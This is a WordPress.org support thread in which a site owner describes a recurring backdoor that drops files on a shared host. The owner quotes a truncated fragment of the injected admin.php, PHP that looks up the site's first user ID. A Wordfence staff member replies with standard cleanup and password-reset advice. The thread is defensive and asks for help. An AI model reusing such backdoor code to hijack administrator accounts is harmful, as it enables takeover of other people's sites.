Title: backdoor host Last modified: July 15, 2021 --- # backdoor host * Resolved [duboi](https://wordpress.org/support/users/duboi/) * (@duboi) * [4 years, 11 months ago](https://wordpress.org/support/topic/backdoor-host/) * Hello, * I have a backdoor that injects files in the root of the shared server where there is no wordpress installed directly, I delete them regularly and I analyze the wordpress plugins of my sites and I installed a monitor plugin for the changes on the ftp server of the sites, apparently I have to do it for each site, and then I have to install a site at the root maybe to see how it starts? see how it starts? * Just if you have some info on scripts or an idea to stop this the attacker creates 4 files each time, thanks admin.php extract of the code : users ORDER BY ID ASC” ); $authorId = 0; $firstUserId = 0; if( $users ) { foreach ( $users as $user ) { if($firstUserId == 0){ $firstUserId = $user->ID; } $wp_user = * Translated with [http://www.DeepL.com/Translator](http://www.DeepL.com/Translator)( free version) Viewing 1 replies (of 1 total) * [WFSupport](https://wordpress.org/support/users/wfsupport/) * (@wfsupport) * [4 years, 11 months ago](https://wordpress.org/support/topic/backdoor-host/#post-14668672) * You can use Wordfence free to clean your site. There is [a guide available here](https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/) that can help walk you through the process. * Make sure and get all your plugins and themes updated and update WordPress core too. If you are on an older branch (WordPress 4.x etc) because you wanted to wait before installing the latest version because of Gutenberg or a custom theme compatibility you still need the latest update in that version. Those can be found here: [https://wordpress.org/download/releases/](https://wordpress.org/download/releases/) WordPress sometimes even patches their older releases if a vulnerability that was found so make sure to update your version if needed. * As a rule, any time I think someone’s site has been compromised I also tell them to update their passwords for their hosting control panel, FTP, WordPress admin users, and database. Because of what I told you at the start of this message, this is very important to do. * Additionally you might find the WordPress Malware Removal section in our free Learning Center helpful. [https://www.wordfence.com/learn/](https://www.wordfence.com/learn/) * If you are unable to clean this on your own there are paid services that will do it for you. Wordfence offers such a service for this. Regardless if you choose to clean it yourself or let someone else do so, we recommend that you make a full backup of the site beforehand. * I hope this helps. * Tim Viewing 1 replies (of 1 total) The topic ‘backdoor host’ is closed to new replies. * ![](https://ps.w.org/wordfence/assets/icon.svg?rev=2070865) * [Wordfence Security - Firewall, Malware Scan, and Login Security](https://wordpress.org/plugins/wordfence/) * [Frequently Asked Questions](https://wordpress.org/plugins/wordfence/#faq) * [Support Threads](https://wordpress.org/support/plugin/wordfence/) * [Active Topics](https://wordpress.org/support/plugin/wordfence/active/) * [Unresolved Topics](https://wordpress.org/support/plugin/wordfence/unresolved/) * [Reviews](https://wordpress.org/support/plugin/wordfence/reviews/) * 1 reply * 2 participants * Last reply from: [WFSupport](https://wordpress.org/support/users/wfsupport/) * Last activity: [4 years, 11 months ago](https://wordpress.org/support/topic/backdoor-host/#post-14668672) * Status: resolved